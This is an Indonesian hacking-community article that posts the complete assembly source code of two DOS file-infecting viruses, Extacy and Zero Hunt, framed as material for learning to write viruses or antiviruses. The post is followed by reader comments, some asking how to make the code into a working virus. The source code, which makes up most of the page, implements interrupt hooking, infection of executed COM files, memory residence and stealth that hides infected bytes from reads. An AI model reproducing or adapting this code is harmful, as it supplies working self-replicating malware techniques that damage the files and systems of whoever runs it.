Home
Hacking
Tutorial
.NET
IT News
Lain-lain
About Us
FAQ
Penerbitan Buku

Klik untuk join milist Jasakom




 

Jasakom Community - Article
Source code Virus Extacy & Zero Hunt
Date: Sunday, December 18, 2005    Hits: 12049    By:  Sibie Project   
Bagi yang ingin mempelajari bagaimana membuat virus ataupun antivirus, pada kesempatan kali ini di bagikan source code virus Extacy dan Zero Hunt.
Setidaknya sebagian ilmu dan teknik dapat diambil dari ke2 virus di bawah ini.






Virus Extacy ------------------------------------------------------------------------ .model tiny .code .radix 16 .code viruslength = heap - _small startload = 90 * 4 _small: call relative oldheader dw 020cdh dw 0bh dup (0) relative: pop bp push ds push es xor ax,ax mov ds,ax mov es,ax mov di,startload cmp word ptr ds:[di+25],di jz exit_small lea si,[bp-3] mov cx,viruslength db 2Eh rep movsb mov di,offset old21 + startload mov si,21*4 push si movsw movsw pop di mov ax,offset int21 + startload stosw xchg ax,cx stosw exit_small: pop es pop ds or sp,sp jnp returnCOM returnGNU: returnCOM: mov di,100 push di mov si,bp movsw movsb ret infect: push ax push bx push cx push dx push si push di push ds push es mov ax,3d02 int 21 xchg ax,bx push cs pop ds push cs pop es mov ax,5700h int 21h push cx push dx mov si,offset oldheader+startload mov ah,3f mov cx,18 push cx mov dx,si int 21 cmp ax,cx jnz go_already_infected mov di,offset target + startload push di rep movsb pop di mov ax,4202 cwd int 21 cmp ds:[di],'ZM' jz infectNOT cmp ds:[di],'MZ' jz infectNOT sub ax,3 mov byte ptr ds:[di],0e9 mov ds:[di+1],ax sub ax,viruslength cmp ds:[si-17],ax jnz finishinfect go_already_infected: pop cx jmp short already_infected db "EXTASY!" db "(c) Metal Militia / Immortal Riot" int21: cmp ax,4b00 jz kewl cmp ax,3e00 jnz oops mov ah,45 int 21 jmp kewl oops: jmp chain infectNOT: jmp go_already_infected kewl: jmp infect finishinfect: mov cx,viruslength mov dx,startload mov ah,40 int 21 mov ax,4200 xor cx,cx cwd int 21 mov ah,40 mov dx,di pop cx int 21 already_infected: pop dx pop cx mov ax,5701h int 21h mov ah,3e int 21 exitinfect: pop es pop ds pop di pop si pop dx pop cx pop bx pop ax chain: db 0ea heap: old21 dw ?, ? target dw 0ch dup (?) endheap: end _small

Virus Zero Hunt--------------------------------------------------------------------

CSEG SEGMENT ASSUME CS:CSEG, ES:CSEG, SS:CSEG org 100h ; Zerohunt virus ; Disassembly by PRiEST ; 4-15-93 CMC_JMP equ 0e9f5h ;This is the virus's signature ;which is located at the beginning ;of infected files, it consist of ;a CMC and a JMP Mem_Loc equ 21ch ;offset of virus in memory Zero_Size equ offset Zero_End-offset Zero_Start ;Size of virus Zero_File_Size equ offset Zero_File_End-offset Zero_Start ;Size of virus in ;file IVT_21 equ 21h*4h ;offset of Int 21h in IVT IVT_24 equ 24h*4h ;offset of Int 24h in IVT Mem_Size equ 413h ;offset of Memory size in BIOS area Zerohunt: jmp Zero_Start ;Dummy code nop org 21ch ;set new origin Zero_Start: call $+3 ;Push IP pop si ;pop IP into SI mov es,ax ;ES = segemnt zero mov di,Mem_Loc ;Offset of memory resident code cmp byte ptr es:[di],0e8h ;This instructions checks to see ;if the virus is already in memory ;by looking for the call at ;Zero_Start in the IVT je Jump_File ;return control to file if in memory mov cx,Zero_Size ;size of virus sub si,3h ;Find offset of Zero_Start rep movsb ;copy us to IVT push es pop ds ;DS = 0 mov bx,IVT_21 ;offset of Interrupt 21 in the IVT les si,ds:[bx] ;Get seg:off of Int 21h mov word ptr ds:[bx],offset Zero_21 ;Point Int 21h to us mov word ptr ds:[bx+2h],ax ;point Int 21h to segment 0 mov word ptr ds:[Old_21+2h],es ;Save Int 21h mov word ptr ds:[Old_21],si ;Save Int 21h mov al,40h ;40h k mov bx,ds:[Mem_Size] ;Get amount of memory in k's sub bx,ax ;subtract 40h to get segment of mem mul bx ;find address of free memory mov word ptr ds:[High_Mem],ax ;Save segment address xor ax,ax ;Zero out AX Jump_File: push cs push cs pop ds ;Restore DS and ES pop es ;Self-modifying code that restores the first 4 bytes of an infected .com ;file. The Jump_Data defines where to jump when the virus is done, this ;is because it only infects files that have a JMP (0e9h) as the first ;instruction, any other file gets ignored. db 0c7h,6,0,1 ;mov word ptr ds:[100h], File_Data dw 20cdh ;quit to DOS db 0c7h,6,2,1 ;mov word ptr ds:[102h], File_Data_2 dw 9090h ;NOPs db 0e9h ;Jump ;This is where the infected program originally jumped to, right now it's ;set back to the beginning so that it will terminate to DOS. Jump_Data dw 0-(offset Jump_Data_End-offset Zero_Start) Jump_Data_End: ;used to find offset of Zero_Start Random_Read: pushf ;Keep stack in order when IRET push cs ;return to this segment call Jump_21 ;Call DOS to read file pushf push ax push es push bx push ds ;save registers mov ah,2fh ;Get address of DTA into ES:BX int 21h push es pop ds ;DTA segment in DS cmp word ptr ds:[bx],CMC_JMP ;Is this file infected? jne Skip_Block_Clean call Stealth ;Hide virus Skip_Block_Clean:pop ds pop bx pop es pop ax ;Pop registers jmp Fix_Flags_Ret ;Fix flags and return Handle_Read: pushf ;Keep stack right push cs ;return to this segment call Jump_21 pushf ;Save flags jb Fix_Flags_Ret xchg dx,bx ;Address of data read into BX cmp word ptr ds:[bx],CMC_JMP ;File infected? jne Fix_Flags_DX cmp word ptr ds:[bx+2h],ax ;is it valid (? I guess) jnb Fix_Flags_DX call Stealth ;Hide virus Fix_Flags_DX: xchg dx,bx ;restore registers Fix_Flags_Ret: popf ;POP flags push bp push ax ;Save registers pushf pop ax ;tranfer flags to ax mov bp,sp ;get stack frame mov ss:[bp+8h],ax ;Save flags directly into stack pop ax pop bp ;POP registers iret Stealth: push si ;Save register mov si,bx ;Where code was read to add si,ds:[bx+2h] ;Where virus is in program push word ptr ds:[si+File_Data-Zero_Start] ;original bytes pop word ptr ds:[bx] ;restore them push word ptr ds:[si+File_Data_2-Zero_Start] ;original bytes pop word ptr ds:[bx+2h] ;restore them too add si,4h ;fix for jump push ax push cx ;save registers mov cx,Zero_Size ;Size of virus xor al,al ;Zero out AL Stealth_Loop: mov byte ptr ds:[si],al ;Remove virus from file inc si loop Stealth_Loop pop cx pop ax pop si ;Pop registers retn Zero_21: cmp ah,21h ;Random read? je Random_Read cmp ah,27h ;Random Block read? je Random_Read cmp ah,3fh ;Handle read? je Handle_Read cmp ax,4b00h ;Execute program? je Infect jmp Jump_21 ;Jump to original Int 21h Infect: push es ;save registers push ax push bx push dx push ds mov ax,3d02h ;open file for writing int 21h xchg ax,bx ;handle into BX mov ah,3fh ;read from file xor cx,cx ;Zero CX mov ds,cx ;zero into DS inc cx ;read one byte mov dx,offset Buffer ;read to variable "buffer" mov si,dx ;same into SI pushf ;Keep stack straight after IRET push cs ;Push CS for Far return call Jump_21 ;Call original Interrupt 21 cmp byte ptr ds:[si],0e9h ;Is the first instruction a jump? je File_Has_Jump jmp Close_File ;File is not valid, close and quit File_Has_Jump: mov ax,4200h ;Set position from start of file dec cx ;CX now equals 0 xor dx,dx ;DX also equals 0 int 21h ;set file position to start of file pop ds pop dx ;POP location of file name push dx push ds ;PUSH them back push bx ;Save file handle number push cs pop es ;Set ES to our CS mov bx,offset High_Mem ;offset of variable High_Mem mov ax,4b03h ;Load file int 21h mov ds,es:[bx] ;Get address of High memory mov cx,Zero_File_Size ;size of virus in File mov dx,cx ;same into DX mov bx,ds:[1h] ;Get jump address mov bp,bx ;I don't recall BP being saved!!! xor al,al ;zero out AL Search_Loop: dec bx ;decrement pointer pop di ;Pop handle je Close_File_DI push di ;Save handle again cmp byte ptr ds:[bx],al ;search for zeros je Search_Looper mov cx,dx ;reset counter Search_Looper: loop Search_Loop ;Scan for size of virus mov di,bp ;Get jump address of file sub di,bx ;minus location of zeros sub di,offset Jump_Data_End-offset Zero_Start ;Make jump mov word ptr cs:[Jump_Data],di ;Save original jump address push word ptr ds:[0] ;save original bytes pop word ptr cs:[File_Data] ;Into our own code push word ptr ds:[2h] ;again with bytes 3 and 4 pop word ptr cs:[File_Data_2] mov si,Mem_Loc ;location of virus in memory mov cx,dx ;Size of virus in file dec cx ;Size of virus push ds pop es ;ES = segment of free memory push cs pop ds ;DS = our segment mov di,bx ;offset of free space in file rep movsb ;copy virus into file (I gather) sub bx,4h ;subtract for jump to virus mov word ptr es:[2h],bx ;Fix jump mov word ptr es:[0],CMC_JMP ;CMC, then JMP mov di,0cfcfh lds si,ds:[IVT_24] ;fetch address of Int 24h xchg di,ds:[si] ;what the hey!? Computer should ;crash if Int 24h is triggered! pop bx ;POP handle number mov ax,5700h ;Get date int 21h push cx push dx ;save original date/time of file push es pop ds ;DS = segment of free memory mov ah,40h mov cx,bp ;size of virus xor dx,dx int 21h ;write to file, I guess the virus pop dx pop cx ;POP the date/time mov ax,5701h ;restore date/time to file int 21h xchg di,bx ;dummy exchange if infection ok Close_File_DI: xchg di,bx ;retore handle from DI for closing Close_File: mov ah,3eh ;close file int 21h lds si,cs:[IVT_24] ;Get Int 24h address from IVT cmp byte ptr ds:[si],0cfh ;Is it to us? jne No_24_Restore ;I know, they're Shitty labels xchg di,ds:[si] ;restore Int 24h No_24_Restore: pop ds pop dx pop bx pop ax pop es ;Pop all registers Jump_21: db 0eah ;jmp seg:off Old_21 dd ? ;segment offset of Int 21h Buffer db ? Zero_End: High_Mem dw ? ;Segment of availible memory Zero_File_End: CSEG ENDS END Zerohunt
By: Sibie Project
Source: JASAKOM Information Center
 
1 2 3 4 5 6 7 8 9
Jasakom Community - Visitor Comment
Nama: balthazor75   Tgl: 4/15/2006 10:03:57 PM
Komentar:
Mas mo nanya nih script di atas di tulis pake program apa? turbo pascal / c , maklum masih pemula nih........ bisa ngga ajarin cara publish web yg dibuat pake frontpage ke hosting yg gratisan makasih banyak semoga dapat di terima di sisinya he..he..
Nama: BlackSweet   Tgl: 3/18/2006 9:00:00 AM
Komentar:
Woiiiiiiiii Scripnya Panjang Banget. Gak ada yang pendek ape
Nama: mino   Tgl: 3/3/2006 11:36:24 PM
Komentar:
aduhhh latif... aaaaccchhhhhhaaaaa...............
Nama: neekatt   Tgl: 2/28/2006 1:16:14 AM
Komentar:
Kumpulan Source code Virus. http://www.deathmule.com/code.html
Nama: sesukanya   Tgl: 2/22/2006 11:34:52 AM
Komentar:
ah masa
Nama: sesukanya   Tgl: 2/22/2006 11:32:20 AM
Komentar:
ah masa
Nama: hack_date   Tgl: 2/14/2006 12:49:53 AM
Komentar:
gmn crnya bikin virus tp g ngerusak file yg ada di komputer? bls ya ke a_thin87@yahoo.com di tunngu..
Nama: hack_date   Tgl: 2/14/2006 12:49:09 AM
Komentar:
Gimana caranya menghentikan virus brontok? trus gmn crnya bikin virus tp g ngerusak file yg ada di komputer?
Nama: Jason   Tgl: 2/13/2006 7:16:23 AM
Komentar:
Source kode itu harus diapain, agar menjadi virus? Haraf di jawab yach, soalnya aku lagi patah hati. Balas ke dadi_jrc@dewa19.com
Nama: Jason   Tgl: 2/13/2006 6:46:53 AM
Komentar:
Source kode itu harus diapain, agar menjadi virus? Haraf di jawab yach, soalnya aku lagi patah hati.
Nama: Dian Maulani   Tgl: 2/11/2006 3:13:58 AM
Komentar:
http://www.geocities.com/dian_maulani2006/UNDANGAN.txt
Nama: brokenc0d3   Tgl: 2/9/2006 4:33:56 PM
Komentar:
Apaan itu? Kalo cuma mo nge-paste gue juga bisa... Kapan mo di explain line per line nya ???
Nama: Lambertus   Tgl: 2/5/2006 10:51:50 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya......
Nama: Lambertus   Tgl: 2/5/2006 10:51:50 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya......
Nama: Lambertus   Tgl: 2/5/2006 10:51:49 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya......
Nama: Lambertus   Tgl: 2/5/2006 10:51:48 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya......
Nama: Lambertus   Tgl: 2/5/2006 10:51:47 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya......
Nama: Lambertus   Tgl: 2/5/2006 10:51:46 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya......
Nama: Lambertus   Tgl: 2/5/2006 10:51:38 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya......
Nama: Lambertus   Tgl: 2/5/2006 10:51:37 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya......
1 2 3 4 5 6 7 8 9

 

© Copyright by Jasakom 2005 All Right Reserved

User Id: *

Password:
* Required Field
User Baru ? Klik di sini
Lupa Password ?
Keyword :
 

Click here to join jasakomdotnet
Klik di sini untuk Join jasakomdotnet




Informasi disini digunakan untuk tujuan pendidikan, Jasakom tidak bertanggung jawab untuk penyalahgunaan informasi yang ada pada web ini. Gunakan segala bentuk informasi disini secara bijak untuk melindungi diri anda sendiri agar  tidak  menjadi korban internet.